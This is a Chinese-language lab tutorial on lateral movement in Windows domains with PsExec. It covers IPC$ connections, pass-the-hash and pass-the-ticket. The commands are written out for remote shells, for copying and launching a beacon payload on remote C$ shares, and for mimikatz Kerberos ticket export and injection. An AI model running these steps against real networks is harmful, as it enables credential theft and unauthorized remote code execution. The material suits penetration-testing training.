当前位置: 首页 > news >正文

内网渗透-【横向移动】PsExec工具远程命令执行横向移动

【横向移动】PsExec工具远程命令执行横向移动

文章目录

  • 【横向移动】PsExec工具远程命令执行横向移动
  • PsExec介绍
  • PsExec使用条件
  • PsExec常用参数
  • 实验复现
    • 4.1、IPC$下的psexec
      • 上传psexec
      • 建立IPC$连接
      • 返回交互的shell或者执行命令
      • 远程上线
    • 4.2、PTH下的psexecs
    • 4.3、PTT下的psexec
      • 上传psexec
      • 进行PTT攻击
      • 导出内存的票据
      • 清除内存中的票据
      • 将高权限的票据文件注入内存
      • 查看票据
      • 远程复制
      • 远程上线

在这里插入图片描述

PsExec介绍

psexec 是 windows 下非常好的一款远程命令行工具。 psexec的使用不需要对方主机开方3389端口, 只需要对方开启admin 共 享 和 i p c 共享和ipc ipc (该共享默认开启,依赖于445端口)。

但是,假如目标主机开启了防火墙(防火墙禁止445端口连接), psexec也是不能使用的,会提示找不到网络路径。

由于psexec是Windows提供的工具,所以杀毒软件将其列在白名单中

下载地址:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools 在这里插入图片描述

PsExec使用条件

1、具有正确的凭证(内存凭证、账号密码、账号NTLM Hash)
2、能建立IPC链接(也就是需要通过smb认证的),且目标机器开启了共享(默认开启的),并且目标 共享中必须有admin$共享

PsExec常用参数

psexec \ip -u administrator -p admin cmd 进⼊半交互式shell
PsExec -accepteula \192.168.108.101 -s cmd.exe 建立交互的shell
psexec \ip - uadministrator -p admin -w c:\cmd 进⼊交互式shell,且c:\是⽬标机器的⼯作⽬录
psexec \ip -u administrator -p admin whoami all 执行命令
psexec \ip -u administrator -p admin -d c:\beacon.exe 执行文件
psexec \ip -u administrator -p admin -h -d c:\beacon.exe UAC的⽤⼾权限执行文件

实验复现

4.1、IPC$下的psexec

上传psexec

在这里插入图片描述

建立IPC$连接

net use \192.168.41.150\ipc$ “Admin@123” /user:administrator
在这里插入图片描述

返回交互的shell或者执行命令

psexec.exe -accepteula \192.168.41.150 -s cmd.exe 返回交互shell (必须是msf或者远程 到桌面CS不行)
psexec.exe -accepteula \192.168.41.150 -s ipconfig 远程执行命令
在这里插入图片描述
在这里插入图片描述
远程复制

copy C:\Users\admin\Desktop\wanli.exe \192.168.41.150\C$

在这里插入图片描述

远程上线

psexec.exe -accepteula \192.168.41.150 -h -d c:\wanli.exe
在这里插入图片描述

4.2、PTH下的psexecs

找到登录的凭证在这里插入图片描述
找到和扫描地址在这里插入图片描述
进行psexec攻击上线在这里插入图片描述

4.3、PTT下的psexec

上传psexec

在这里插入图片描述

进行PTT攻击

导出内存的票据

mimikatz.exe “privilege::debug” “sekurlsa::tickets /export”

在这里插入图片描述

清除内存中的票据

shell klist purge
mimikatz kerberos::purge
两个都是清除票据

将高权限的票据文件注入内存

mimikatz kerberos::ptt [0;998d7]-2-0-40e10000-Administrator@krbtgt-
HACK.COM.kirbi

查看票据

shell klist
mimikatz kerberos::tgt

远程复制

copy C:\Users\admin\Desktop\wanli.exe \dc.hack.com\C$

在这里插入图片描述

远程上线

psexec.exe \dc.hack.com -h -d c:\wanli.exe

在这里插入图片描述

相关文章:

  • 菜谱查询易语言代码
  • springboot+旅游管理系统 毕业设计-附源码261117
  • 未来十年最赚钱的专业是什么
  • R语言ggplot2可视化:使用ggpubr包的ggerrorplot函数可视化误差线(可视化不同水平均值点以及se标准误差)
  • 【Pytorch】torch.Tensor.view()
  • 1766. 互质树 DFS+桶
  • 【课程作业】西瓜书 机器学习课后习题 : 第十二章
  • 【毕业设计】深度学习手势识别实现 - python OpenCV 机器视觉
  • 【数据结构】队列的顺序实现
  • 数据结构与算法基础(1)-- 绪论 (上)
  • LeetCode 每日一题——687. 最长同值路径
  • 外部数据评价函数
  • js---深拷贝函数
  • ElasticSearch linux上重启
  • elasticsearch object、nested类型对比
  • 【347天】每日项目总结系列085(2018.01.18)
  • 【mysql】环境安装、服务启动、密码设置
  • 2018一半小结一波
  • October CMS - 快速入门 9 Images And Galleries
  • OSS Web直传 (文件图片)
  • Python3爬取英雄联盟英雄皮肤大图
  • Quartz初级教程
  • React Native移动开发实战-3-实现页面间的数据传递
  • Shadow DOM 内部构造及如何构建独立组件
  • 如何使用 JavaScript 解析 URL
  • 微信支付JSAPI,实测!终极方案
  • 再次简单明了总结flex布局,一看就懂...
  • 【云吞铺子】性能抖动剖析(二)
  • 昨天1024程序员节,我故意写了个死循环~
  • ​二进制运算符:(与运算)、|(或运算)、~(取反运算)、^(异或运算)、位移运算符​
  • ## 临床数据 两两比较 加显著性boxplot加显著性
  • #### go map 底层结构 ####
  • #AngularJS#$sce.trustAsResourceUrl
  • #中国IT界的第一本漂流日记 传递IT正能量# 【分享得“IT漂友”勋章】
  • (a /b)*c的值
  • (AngularJS)Angular 控制器之间通信初探
  • (cljs/run-at (JSVM. :browser) 搭建刚好可用的开发环境!)
  • (LeetCode 49)Anagrams
  • (ZT)一个美国文科博士的YardLife
  • (笔记)Kotlin——Android封装ViewBinding之二 优化
  • (超详细)2-YOLOV5改进-添加SimAM注意力机制
  • (二)Pytorch快速搭建神经网络模型实现气温预测回归(代码+详细注解)
  • (附程序)AD采集中的10种经典软件滤波程序优缺点分析
  • (附源码)ssm智慧社区管理系统 毕业设计 101635
  • (一)80c52学习之旅-起始篇
  • (译) 理解 Elixir 中的宏 Macro, 第四部分:深入化
  • .libPaths()设置包加载目录
  • .net core使用RPC方式进行高效的HTTP服务访问
  • .net 托管代码与非托管代码
  • /etc/shadow字段详解
  • @property @synthesize @dynamic 及相关属性作用探究
  • @vue/cli 3.x+引入jQuery
  • [2009][note]构成理想导体超材料的有源THz欺骗表面等离子激元开关——
  • [C++]C++基础知识概述
  • [G-CS-MR.PS02] 機巧之形2: Ruler Circle